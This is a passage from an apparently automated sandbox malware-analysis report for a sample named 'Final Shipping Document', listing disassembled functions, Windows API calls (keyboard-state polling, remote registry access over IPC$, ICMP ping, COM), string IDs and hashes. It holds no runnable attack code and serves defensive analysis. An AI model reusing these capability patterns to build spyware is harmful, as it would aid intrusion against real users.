                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: SendString$_wcslen
                                                            • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                            • API String ID: 2420728520-1007645807
                                                            • Opcode ID: 237b41ce87fae28573b328069e50e95909649a4d98c262dfab6d2a211f19f668
                                                            • Instruction ID: 4682a41bcde6883a448c531ccc4dc2c5da70cbf21a7ea02c60dceae94b16deac
                                                            • Opcode Fuzzy Hash: 237b41ce87fae28573b328069e50e95909649a4d98c262dfab6d2a211f19f668
                                                            • Instruction Fuzzy Hash: 82113731A9426979D720A762DC8AEFF6ABCEFD6F40F4408797811A20D1EFB05A45C5B0
                                                            Function 00C05CC6 Relevance: 18.2, APIs: 12, Instructions: 173COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetDlgItem.USER32(?,00000001), ref: 00C05CE2
                                                            • GetWindowRect.USER32(00000000,?), ref: 00C05CFB
                                                            • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00C05D59
                                                            • GetDlgItem.USER32(?,00000002), ref: 00C05D69
                                                            • GetWindowRect.USER32(00000000,?), ref: 00C05D7B
                                                            • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00C05DCF
                                                            • GetDlgItem.USER32(?,000003E9), ref: 00C05DDD
                                                            • GetWindowRect.USER32(00000000,?), ref: 00C05DEF
                                                            • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00C05E31
                                                            • GetDlgItem.USER32(?,000003EA), ref: 00C05E44
                                                            • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00C05E5A
                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00C05E67
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Window$ItemMoveRect$Invalidate
                                                            • String ID:
                                                            • API String ID: 3096461208-0
                                                            • Opcode ID: f1ac61c605ddf7b0c73d6341dd2b6f1811a19a4d4aa55578f750bb69e1127107
                                                            • Instruction ID: ca8fa57b947c29638b57150983c5e5462b3b5107dcc79e2affd03a4a2f926d79
                                                            • Opcode Fuzzy Hash: f1ac61c605ddf7b0c73d6341dd2b6f1811a19a4d4aa55578f750bb69e1127107
                                                            • Instruction Fuzzy Hash: BA51FBB5A10619AFDF18CF68DD89BAEBBB9EB48300F148129F915E6290D7709E04CF50
                                                            Function 00BB8BCD Relevance: 18.2, APIs: 12, Instructions: 168timeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00BB8F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00BB8BE8,?,00000000,?,?,?,?,00BB8BBA,00000000,?), ref: 00BB8FC5
                                                            • DestroyWindow.USER32(?), ref: 00BB8C81
                                                            • KillTimer.USER32(00000000,?,?,?,?,00BB8BBA,00000000,?), ref: 00BB8D1B
                                                            • DestroyAcceleratorTable.USER32(00000000), ref: 00BF6973
                                                            • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00BB8BBA,00000000,?), ref: 00BF69A1
                                                            • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00BB8BBA,00000000,?), ref: 00BF69B8
                                                            • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00BB8BBA,00000000), ref: 00BF69D4
                                                            • DeleteObject.GDI32(00000000), ref: 00BF69E6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                            • String ID:
                                                            • API String ID: 641708696-0
                                                            • Opcode ID: 9145c2a85f1f4db9d6e543b513511e4376ab68105ada99f1c610e6c86a05b6f5
                                                            • Instruction ID: eb75d58a7200ef7ff1b63fcda1c3751f2b41e30eddfcddfcc0b2425ad0b056f4
                                                            • Opcode Fuzzy Hash: 9145c2a85f1f4db9d6e543b513511e4376ab68105ada99f1c610e6c86a05b6f5
                                                            • Instruction Fuzzy Hash: B261DB31012604DFCB259F18C989BBD7BF5FB04312F1884ACEA469B5A0CBB1A8C5DF90
                                                            Function 00BB9838 Relevance: 18.1, APIs: 12, Instructions: 137COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00BB9944: GetWindowLongW.USER32(?,000000EB), ref: 00BB9952
                                                            • GetSysColor.USER32(0000000F), ref: 00BB9862
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: ColorLongWindow
                                                            • String ID:
                                                            • API String ID: 259745315-0
                                                            • Opcode ID: 2897bfc5e816727288027dab07be7ac1f4f71e56c5af36775a29c3402209f22b
                                                            • Instruction ID: 10383beb601937148f7ac33d2ceff3f7cad851ce27fb6e5e4ce9d103433005e7
                                                            • Opcode Fuzzy Hash: 2897bfc5e816727288027dab07be7ac1f4f71e56c5af36775a29c3402209f22b
                                                            • Instruction Fuzzy Hash: 51417C31144644AFDB215B389C88BBD3BF5EB16370F144699FAB2972E1D7B19842EB10
                                                            Function 00C096E2 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,00BEF7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00C09717
                                                            • LoadStringW.USER32(00000000,?,00BEF7F8,00000001), ref: 00C09720
                                                              • Part of subcall function 00BA9CB3: _wcslen.LIBCMT ref: 00BA9CBD
                                                            • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,00BEF7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00C09742
                                                            • LoadStringW.USER32(00000000,?,00BEF7F8,00000001), ref: 00C09745
                                                            • MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 00C09866
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: HandleLoadModuleString$Message_wcslen
                                                            • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                            • API String ID: 747408836-2268648507
                                                            • Opcode ID: 9876fdbc3bd9fd9a4574b4215d15e5116fad168130de690a08ca188fecdaae99
                                                            • Instruction ID: a608aea76454e3e4cfe74bd34181a7f357dbb5d2d3af4b86b9d41a73cf8eb75d
                                                            • Opcode Fuzzy Hash: 9876fdbc3bd9fd9a4574b4215d15e5116fad168130de690a08ca188fecdaae99
                                                            • Instruction Fuzzy Hash: 10414F72804219AACF14EBE0CD86EEEB7B8EF16740F1440A5F50572092EF356F49DB61
                                                            Function 00C006DE Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00BA6B57: _wcslen.LIBCMT ref: 00BA6B6A
                                                            • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00C007A2
                                                            • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00C007BE
                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00C007DA
                                                            • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00C00804
                                                            • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 00C0082C
                                                            • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00C00837
                                                            • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00C0083C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                            • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                            • API String ID: 323675364-22481851
                                                            • Opcode ID: af343ffce847e13f26031f2ee4bc0a567941afa2bb7f0ffab856165390171b46
                                                            • Instruction ID: 1b23f7332a91dd2a089fb6fa36484493de37607fd06dcf35ee7ef0e1a5fbbabc
                                                            • Opcode Fuzzy Hash: af343ffce847e13f26031f2ee4bc0a567941afa2bb7f0ffab856165390171b46
                                                            • Instruction Fuzzy Hash: 3D411972C14229ABCF15EBA4DC85EEDB7B8BF04750F554169E911B31A1EB345E04CBA0
                                                            Function 00C23C30 Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • VariantInit.OLEAUT32(?), ref: 00C23C5C
                                                            • CoInitialize.OLE32(00000000), ref: 00C23C8A
                                                            • CoUninitialize.OLE32 ref: 00C23C94
                                                            • _wcslen.LIBCMT ref: 00C23D2D
                                                            • GetRunningObjectTable.OLE32(00000000,?), ref: 00C23DB1
                                                            • SetErrorMode.KERNEL32(00000001,00000029), ref: 00C23ED5
                                                            • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00C23F0E
                                                            • CoGetObject.OLE32(?,00000000,00C3FB98,?), ref: 00C23F2D
                                                            • SetErrorMode.KERNEL32(00000000), ref: 00C23F40
                                                            • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00C23FC4
                                                            • VariantClear.OLEAUT32(?), ref: 00C23FD8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                            • String ID:
                                                            • API String ID: 429561992-0
                                                            • Opcode ID: b8e9125d288273d813d5ec6d032f65f67e7d943441d236f4b77eaaaceba0446d
                                                            • Instruction ID: 9f5f07ad285fe05aed99fe187ee2399e6097b31c9fd3dd6e777e737b894f3421
                                                            • Opcode Fuzzy Hash: b8e9125d288273d813d5ec6d032f65f67e7d943441d236f4b77eaaaceba0446d
                                                            • Instruction Fuzzy Hash: 80C17671618351AFC700DF68D884A2BBBE9FF89748F10495DF99A9B250DB30EE05CB52
                                                            Function 00C17A96 Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CoInitialize.OLE32(00000000), ref: 00C17AF3
                                                            • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00C17B8F
                                                            • SHGetDesktopFolder.SHELL32(?), ref: 00C17BA3
                                                            • CoCreateInstance.OLE32(00C3FD08,00000000,00000001,00C66E6C,?), ref: 00C17BEF
                                                            • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00C17C74
                                                            • CoTaskMemFree.OLE32(?,?), ref: 00C17CCC
                                                            • SHBrowseForFolderW.SHELL32(?), ref: 00C17D57
                                                            • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00C17D7A
                                                            • CoTaskMemFree.OLE32(00000000), ref: 00C17D81
                                                            • CoTaskMemFree.OLE32(00000000), ref: 00C17DD6
                                                            • CoUninitialize.OLE32 ref: 00C17DDC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                            • String ID:
                                                            • API String ID: 2762341140-0
                                                            • Opcode ID: 5dcedba67548b70f907978a7bdf149956b1f74b9ef60380dc57f1903e8c27de7
                                                            • Instruction ID: 0c8d50c271c0d177dbf5100e69326934599bd6c384ebb28dd926aaa14122426d
                                                            • Opcode Fuzzy Hash: 5dcedba67548b70f907978a7bdf149956b1f74b9ef60380dc57f1903e8c27de7
                                                            • Instruction Fuzzy Hash: 93C12C75A04109AFCB14DF64C898DAEBBF5FF49304B148599F816DB261D730EE81DB90
                                                            Function 00C3541D Relevance: 16.7, APIs: 11, Instructions: 191windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00C35504
                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00C35515
                                                            • CharNextW.USER32(00000158), ref: 00C35544
                                                            • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00C35585
                                                            • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00C3559B
                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00C355AC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$CharNext
                                                            • String ID:
                                                            • API String ID: 1350042424-0
                                                            • Opcode ID: efccf3fe8b2a7243fb699121f2e4c620bc7f0e88ca799ad28e1ee09a49c9274d
                                                            • Instruction ID: 29ec1b69d9c06257b20f639e58d91bc3ca8ef4e8d88536e3ae29c6d9a780d873
                                                            • Opcode Fuzzy Hash: efccf3fe8b2a7243fb699121f2e4c620bc7f0e88ca799ad28e1ee09a49c9274d
                                                            • Instruction Fuzzy Hash: 5D618B71920608AFDF10DF95CC85AFE7BB9EB0A720F108145F925AA291D7749B81DFA0
                                                            Function 00BFFA88 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00BFFAAF
                                                            • SafeArrayAllocData.OLEAUT32(?), ref: 00BFFB08
                                                            • VariantInit.OLEAUT32(?), ref: 00BFFB1A
                                                            • SafeArrayAccessData.OLEAUT32(?,?), ref: 00BFFB3A
                                                            • VariantCopy.OLEAUT32(?,?), ref: 00BFFB8D
                                                            • SafeArrayUnaccessData.OLEAUT32(?), ref: 00BFFBA1
                                                            • VariantClear.OLEAUT32(?), ref: 00BFFBB6
                                                            • SafeArrayDestroyData.OLEAUT32(?), ref: 00BFFBC3
                                                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00BFFBCC
                                                            • VariantClear.OLEAUT32(?), ref: 00BFFBDE
                                                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00BFFBE9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                            • String ID:
                                                            • API String ID: 2706829360-0
                                                            • Opcode ID: 6ea4461533c49638caf138d1abcb2a467e163b4ef4e414254c053f8f893229c0
                                                            • Instruction ID: 5255023fa8642b312e561d6b6431156310d414f604a980a7bee255e8054cf72a
                                                            • Opcode Fuzzy Hash: 6ea4461533c49638caf138d1abcb2a467e163b4ef4e414254c053f8f893229c0
                                                            • Instruction Fuzzy Hash: 64412135A0021A9FCF10DF64D894ABDBBB9EF48354F008065E955A7261DB34E945CF90
                                                            Function 00C09C79 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetKeyboardState.USER32(?), ref: 00C09CA1
                                                            • GetAsyncKeyState.USER32(000000A0), ref: 00C09D22
                                                            • GetKeyState.USER32(000000A0), ref: 00C09D3D
                                                            • GetAsyncKeyState.USER32(000000A1), ref: 00C09D57
                                                            • GetKeyState.USER32(000000A1), ref: 00C09D6C
                                                            • GetAsyncKeyState.USER32(00000011), ref: 00C09D84
                                                            • GetKeyState.USER32(00000011), ref: 00C09D96
                                                            • GetAsyncKeyState.USER32(00000012), ref: 00C09DAE
                                                            • GetKeyState.USER32(00000012), ref: 00C09DC0
                                                            • GetAsyncKeyState.USER32(0000005B), ref: 00C09DD8
                                                            • GetKeyState.USER32(0000005B), ref: 00C09DEA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: State$Async$Keyboard
                                                            • String ID:
                                                            • API String ID: 541375521-0
                                                            • Opcode ID: ed4e672c7993b58579e734bd83b6f020a651a3e8c8fd63c4b9680cb86b35789d
                                                            • Instruction ID: 1f10d532f3595921334dbd6d56fab6835015988e6cd30fe05f595c57e3173473
                                                            • Opcode Fuzzy Hash: ed4e672c7993b58579e734bd83b6f020a651a3e8c8fd63c4b9680cb86b35789d
                                                            • Instruction Fuzzy Hash: 8C41D6349447C969FF308764C8443B9BEA0EB11344F04805ADAE6565C3DBB49FC8C792
                                                            Function 00C2055B Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • WSAStartup.WSOCK32(00000101,?), ref: 00C205BC
                                                            • inet_addr.WSOCK32(?), ref: 00C2061C
                                                            • gethostbyname.WSOCK32(?), ref: 00C20628
                                                            • IcmpCreateFile.IPHLPAPI ref: 00C20636
                                                            • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00C206C6
                                                            • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00C206E5
                                                            • IcmpCloseHandle.IPHLPAPI(?), ref: 00C207B9
                                                            • WSACleanup.WSOCK32 ref: 00C207BF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                            • String ID: Ping
                                                            • API String ID: 1028309954-2246546115
                                                            • Opcode ID: 7767bd8b3e43072a0ad772deaa9a54d171d9bc9cdf87804aadcac5cff28eff3c
                                                            • Instruction ID: 32f53fc2779a8b52fadc0214dba9eb280aa9ef97272c50ab9c3270794964ee6c
                                                            • Opcode Fuzzy Hash: 7767bd8b3e43072a0ad772deaa9a54d171d9bc9cdf87804aadcac5cff28eff3c
                                                            • Instruction Fuzzy Hash: 03919D356082119FD320DF15D888F1ABBE0EF45718F2485AAF4699BAA3C770EE45CF91
                                                            Function 00C28CD3 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$BuffCharLower
                                                            • String ID: cdecl$none$stdcall$winapi
                                                            • API String ID: 707087890-567219261
                                                            • Opcode ID: 1c53385dea7dd9c73ba0bad58baeb60c063ad68904a91198ae50746a9a29e12f
                                                            • Instruction ID: da93edcc0b84195bd5f8e4667ed6ca49ba4759488904aafad1286b04ef03437b
                                                            • Opcode Fuzzy Hash: 1c53385dea7dd9c73ba0bad58baeb60c063ad68904a91198ae50746a9a29e12f
                                                            • Instruction Fuzzy Hash: 9D51D236A051279BCF24DF6CD8809BEB3E5BF65724B214229E426E76C4DB30DE48C790
                                                            Function 00C2372C Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CoInitialize.OLE32 ref: 00C23774
                                                            • CoUninitialize.OLE32 ref: 00C2377F
                                                            • CoCreateInstance.OLE32(?,00000000,00000017,00C3FB78,?), ref: 00C237D9
                                                            • IIDFromString.OLE32(?,?), ref: 00C2384C
                                                            • VariantInit.OLEAUT32(?), ref: 00C238E4
                                                            • VariantClear.OLEAUT32(?), ref: 00C23936
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
